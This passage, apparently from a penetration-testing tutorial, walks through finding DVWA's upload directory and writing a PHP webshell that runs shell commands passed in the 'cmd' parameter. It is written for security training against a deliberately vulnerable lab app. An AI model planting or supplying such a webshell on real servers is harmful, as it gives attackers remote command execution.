In this recipe, we will upload a file to the server. We need to know where is it going to be stored in order to be able to access it via programming. To get the upload location, go to Upload in DVWA and upload any JPG image. If the upload is successful, it will display the path to which it was uploaded (../../hackable/uploads/). Now we know the relative path where the application saves the uploaded files; that's enough for this recipe.

Now create a file called webshell.php with the following content:

<?
 system($_GET['cmd']);
 echo PHP_EOL . 'Type a command: <form method="GET" action="../../hackable/uploads/webshell.php"><input type="text" name="cmd"/></form>' . PHP_EOL;
 ?>

Notice how the action parameter includes the upload path we got from uploading the JPG file.